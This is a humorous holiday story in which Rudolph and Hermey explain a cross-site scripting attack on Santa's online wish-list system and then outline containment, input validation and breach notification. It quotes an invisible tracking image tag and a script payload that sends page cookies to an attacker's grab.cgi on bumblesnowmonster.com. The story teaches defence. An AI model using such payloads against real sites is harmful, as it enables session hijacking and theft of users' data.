===============
Rudolph's XmaSS
===============
By Martin Burton (UK)
The big guy cheerfully loaded up his sleigh with the latest consignment of gifts, destined for all the
"nice" children. Santa thought happily of how much easier this year's task had become since the installation of the North Pole Village's new IT infrastructure.
Collecting all those paper wish
lists had been an extremely tiring task. When Bodgit and Scarper Corp. had approached him with the idea of an online system to collect Christmas wish lists, he'd jumped at the chance. To top it all off he
could also have his "naughty'n'nice"(TM) database integrated with the new system. The database held the names of children, their addresses and a flag that indicated whether the child had been
"nice" or "naughty" during the year.
By integrating the systems, Santa's elves in the operations centre could receive a child's online wish request through a browser based front-end and
instantly cross-reference with the "naughty'n'nice" database to determine whether this child should receive their wish.
Bodgit and Scarper had certainly delivered the goods. The system worked like
a charm. Productivity was up, and it even looked as though Santa would be able to take a weekend break before Christmas Eve.
Rudolph, the often ostracized reindeer, and his pal Hermey the elf had been a
little worried about the lack of any IT security personnel within Santa's organisation. Together they'd decided to set aside some time each evening to review Santa's application logs. Santa had been quite
happy with the idea, as, having attended an IT security conference designed for managers, he knew that he should have someone around to handle any IT related incidents. Who better to entrust with this service than
Rudolph, his most trusted reindeer, and Hermey, who had never quite applied himself to toy-making like the other elves.
As he heaved yet another heavy parcel onto his sleigh, Santa noticed Rudolph and Hermey
heading towards him. They looked a little agitated. That frown on Hermey's face didn't look good, and as they got nearer he could have sworn that Rudolph's normally glowing nose seemed rather subdued.
"Santa, we've got a problem," said Hermey. "Just take a look at this."
Rudolph handed over a printout, obviously the logs that they pored over so avidly. The duo had highlighted two of
the entries in the log.
Santa reached into his pocket for his reading glasses and peered at the log. It was the record of entries received via the online wish application.
The first highlighted entry read:
<IMG ID="Picture" HEIGHT=0 WIDTH=0 SRC="http://www.bumblesnowmonster.com/Sample.jpg" BORDER=0>
"I don't understand this Rudolph,"
said Santa. "It doesn't look like all the other wishes. In fact it doesn't look like a wish at all!"
"Exactly, but just take a look at the next one"
Santa noticed that the next highlighted entry was from the wish list of the same child. He read:
<script>document.location='http://www.bumblesnowmonster.com/cgi-bin/grab.cgi?'+document.cookie</script>
Santa looked up. "OK, now I'm totally bemused, would you care to tell me just what I'm seeing here"
"Well, Santa, what you're looking at is someone trying to compromise your applications. The
attacker is using something called a Cross-Site Scripting attack," explained Rudolf.
"You see," added Hermey, "when someone enters their wishes into the online wish form, then that input gets
displayed back to a browser. If the input happens to be HTML then the browser will quite happily render it as such."
"OK, but I still don't get it."
"Right, lets take a look at
that first entry," said Rudolf. "What you are looking at is a HTML image tag, it instructs a web browser to download and display an image on the screen. Our attacker entered an image tag to
download an image from bumblesnowmonster.com into the wish form."
"OK, I understand that, but why?" asked Santa.
"Two reasons," said Hermey. "One... to check whether the
online wish application is vulnerable. You see, when the wish is submitted, and displayed back to the attackers browser, he can look at the page source and check whether the HTML he entered is there..."
"Why the page source?" asked Santa. "Wouldn't he just be able to see the image?"
"No," answered Rudolph, "notice those parameters to the image tag, HEIGHT=0, WIDTH=0
and BORDER=0. Well, those instruct the browser to display an image that is 0 pixels tall by 0 pixels wide and has no border. Which means that to all intents and purposes the image is invisible!"
"Hmmm... now why would he want to do that?"
"Ahhh, that's where the second reason comes in," said Hermey. "You see it's not only the culprit's web browser that will render the
HTML. Our browsers here in North Pole Village will do the same thing. Meaning that our browsers will fire off a request to bumblesnowmonster.com to download an image, but we'll never notice it."
"And what's the point in that?"
"Logs!"
"Logs?"
"Yes," said Rudolph. "We have to assume that our attacker has control over the webserver at
bumblesnowmonster.com, and that he's reading the access logs in the same way that Hermey and I do for ours, meaning..."
"He has a method of determining from which IP address a request for this image
originated," finished Hermey. "He could use that information to launch some kind of attack against us."
"Not only that," added Rudolph. "He also knows from the HTTP request
headers what browser software and operating system we are using. He could use that information to craft an attack against any vulnerabilities in our systems"
"Yikes, that's not good!" cried Santa.
"No, it's not," agreed Rudolph, "but that's not the worst of it."
Santa groaned.
"Take another look at the second entry"
Santa looked again.
"OK, I see those angle bracket thingamybobs, so I guess we're talking HTML tags again?"
"Yes, but these tags work in a slightly different way," said Hermey.
"You see, anything between those <script> and </script> tags is run as a javascript program on the viewers browser."
"Now, I've heard of javascript," said Santa, "but I've no idea what it all does. Tell me."
"OK. This script is using a standard javascript object called 'document', which
represents the current page open in the browser. Our attacker is using two 'properties' of the document object, called 'location' and 'cookie'"
"A cookie is a small text file, stored by a browser
on behalf of a web page or application, so that some information can be made persistent throughout a session," added Rudolph, "you see, the world wide web was never designed for the type of applications we use
today where we might want to maintain something like login credentials or a shopping basket or such when visiting multiple pages. Cookies were implemented to overcome the page-oriented nature of HTML and the HTTP
protocol."
"I understand," said Santa, "so what's our little hooligan doing with this script?"
"What he's doing," said Hermey, "is telling the browser that it should
go to another location. That is, to load a new page. Hang on, I'll demonstrate"
Hermey took out his wireless PDA, started his favourite text editor and typed:
<html>
<head></head>
<body>
<script>
document.location="http://www.counterhack.net"
</script>
</body>
</html>
He saved the file.
"Now, if I open up this file in my browser I get..."
"Redirected to a web site!" gasped Santa. He peered at the screen. "Hmmm, that book,
'Malware', for some reason I seem to have a lot of requests for it on the wish list! It must be good."
"Yes, but you get the idea?" asked Hermey.
"I do," answered Santa, "but what's this cookie thing at the end?"
"That's the really nasty bit," said Rudolph. "You see our attacker isn't just loading a page into our
browsers, he's calling a script on his own server called grab.cgi, in much the same way as our wish entry form calls a script on *our* server. What he's passing to that script is the contents of any cookie that is
set on the page where his script is rendered. Because this is being executed on one of our elves browsers, the details in the cookie are going to contain administrative information, not only for the wish system,
but for the Naughty'n'Nice database too"
"Oh, my giddy aunt!" exclaimed Santa. "That means that he could have access to all the data in Naughty'n'Nice. Heck, he could even change
his status."
"Yes. Or someone else's," added Rudolph somberly.
There was a moment of silence as Santa contemplated the ramifications of this news.
"Righto boys, we've been hacked. So what do we do now?"
"There are a number of things that need to be done," said Rudolph, who was glad he'd taken Track 4 at a recent SANS
conference. "We need to contain the attack, eradicate the problem, recover the systems to a known good state, and then sit down and make sure that this can't happen again."
"OK, I'll leave
that to you Rudolph," said Santa, "just remember that everything you do needs to be documented and adhere to North Pole policies and procedures. I'd just like to know one thing. How do you propose
to fix the system."
"There are two approaches to that," answered Rudolph. "Either, we could change the web application to add validation to fields that are submitted via the online form.
The validation routine would strip HTML tags out of the input, leaving only plain text. This is by far the safest route, as a good validation routine will also protect us from SQL injection attacks, but they are
another story."
"Or...," said Hermey, "we can alter the settings in our web browsers to turn off scripting and image downloading. The only problem with this approach is that the
malicious code will still be able to enter our data. It takes just one misconfigured browser to view that data and we're back at square one"
"Sounds like you guys know what you're doing," said
Santa, "I'll leave you to get on with that. How does all of this effect our e-mail wish submission service?"
"Luckily for us our e-mail doesn't interface directly with the web
application," answered Rudolph, "but our mail readers are capable of displaying HTML email and running scripts. So I'll be recommending a change to our mail reader's configuration to display only plain
text and to disable scripting. That will prevent any information being leaked from our mail reader through a similar attack. If we ever integrate the email submission system with the web application, then the
validation routines that we put in can be re-used to remove malicious input before it enters the system."
"Well, I guess that clears things up for the moment," said Santa.
"Just one more thing," said Rudolph.
"Yes."
"You might just need a list of every child in California. According to California Law SB 1386, any California consumers whose
private data has been exposed in a computer attack must be notified."
Santa groaned.
As he trudged across the snow towards his office, hr pulled his mobile 'phone from his pocket.
Someone at Bodgit and Scarper Corp. was going to get it in the neck...
References:
"Javascript Guide"
http://wp.netscape.com/eng/mozilla/3.0/handbook/javascript/
"SB 1386 Senate Bill"
http://info.sen.ca.gov/pub/01-02/bill/sen/sb_1351-1400/sb_1386_bill_20020926_chaptered.html |
|
